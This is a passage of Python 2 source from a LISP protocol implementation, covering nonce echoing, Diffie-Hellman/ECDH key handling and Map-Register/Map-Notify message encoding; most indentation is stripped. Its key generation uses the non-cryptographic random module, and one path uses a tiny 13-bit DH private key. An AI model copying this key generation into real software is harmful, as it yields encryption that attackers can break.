lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
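#
# Echo-nonce exchange at a glance, an illustrative summary of the class
# above: an xTR in request-nonce mode returns a nonce from
# get_request_or_echo_nonce() with the high-order bit (0x80000000) set,
# telling the caller to set the e-bit in the data header. The remote xTR
# stores that nonce via receive_request() and echoes it back in its own
# data packets; receive_echo() records the echo. If no echo arrives
# within LISP_NONCE_ECHO_INTERVAL, change_state() takes the RLOC down to
# the no-echoed-nonce state.
#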
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys():
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key)
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
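    #
    # Illustrative note for get_iv() above: the counter increments per
    # packet so an IV never repeats under the same key, and the packed
    # size matches what each cipher expects: 8 bytes for chacha20, 12
    # bytes (a 4-byte high word plus an 8-byte low word) for AES-GCM, and
    # 16 bytes for AES-CBC.
    #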
def key_length(self, key):
if (type(key) != str): key = self.normalize_pub_key(key)
return(len(key) / 2)
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
return("0x{}...{}({})".format(k[0:4], k[-4::], self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (type(key) == str):
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#endif
key = lisp_hex_string(key).zfill(256)
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
        return(pow(g, key, p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
            p = self.dh_p_value
            self.shared_key = pow(remote_key, key, p)
#endif
#
        # This should only be used in a lab for debugging and never live,
        # since it's a security risk to expose the shared-key (even though
        # the entire key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
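    #
    # Worked form of the key derivation above (illustrative), with local
    # public key l, remote public key r, and shared secret s:
    #
    #   context      = "0001" + "lisp-crypto" + hex(l ^ r) + "0100"
    #   key-material = HMAC-SHA256(key=context, data=s)
    #   encrypt-key  = high-order 128 bits of key-material
    #   icv-key      = low-order 128 bits of key-material
    #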
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
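    #
    # Illustrative note for do_icv() above: both paths return hex digits.
    # The poly1305 path produces a 128-bit (32 hex digit) tag keyed with
    # the encrypt-key and icv-key; the hmac path truncates the sha256
    # digest to its first 40 hex digits (160 bits).
    #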
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
        # Put in the cipher suite value, then insert the key-length and the
        # public key material. The ECDH 25519 cipher suites are not
        # negotiated if the curve25519 library is not installed on the
        # system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
        # is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
        # Iterate to pull 8 bytes (64 bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
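#
# Sketch of the public-key word packing used by lisp_keys.encode_lcaf()
# and decode_lcaf() above, illustrative only: the hex key string is cut
# into 16-hex-digit (64-bit) words and each word is byte-swapped into
# network order on the wire; the decoder folds the words back into one
# integer.
#
def lisp_example_pack_pub_key(pub_key_hex):
    packed = ""
    for i in range(0, len(pub_key_hex), 16):
        word = int(pub_key_hex[i:i+16], 16)
        packed += struct.pack("Q", byte_swap_64(word))
    #endfor
    return(packed)
#enddef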
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
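#
# Minimal sketch, not called anywhere in this file: peek at the type
# nibble of a LISP control message, the same field that
# lisp_control_header.decode() extracts from the first byte of the fixed
# header above.
#
def lisp_example_control_type(packet):
    if (len(packet) < 1): return(None)
    return(struct.unpack("B", packet[0:1])[0] >> 4)
#enddef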
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is 1 of 8 values that describes the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20-encrypted.
# The e-bit must be set by the ETR to indicate that the Map-Register was
# encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
        # Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return(False)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
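#
# First-long layout sketch for lisp_map_register.encode() above
# (illustrative): the type sits in the top nibble, the P/S/I bits directly
# below it, the 3-bit encryption kid in bits 14-16 with the e-bit at
# 0x2000, the remaining flag bits beneath, and the record count in the
# low byte:
#
#   first_long = (LISP_MAP_REGISTER << 28) | flag-bits | (kid << 14) | count
#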
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
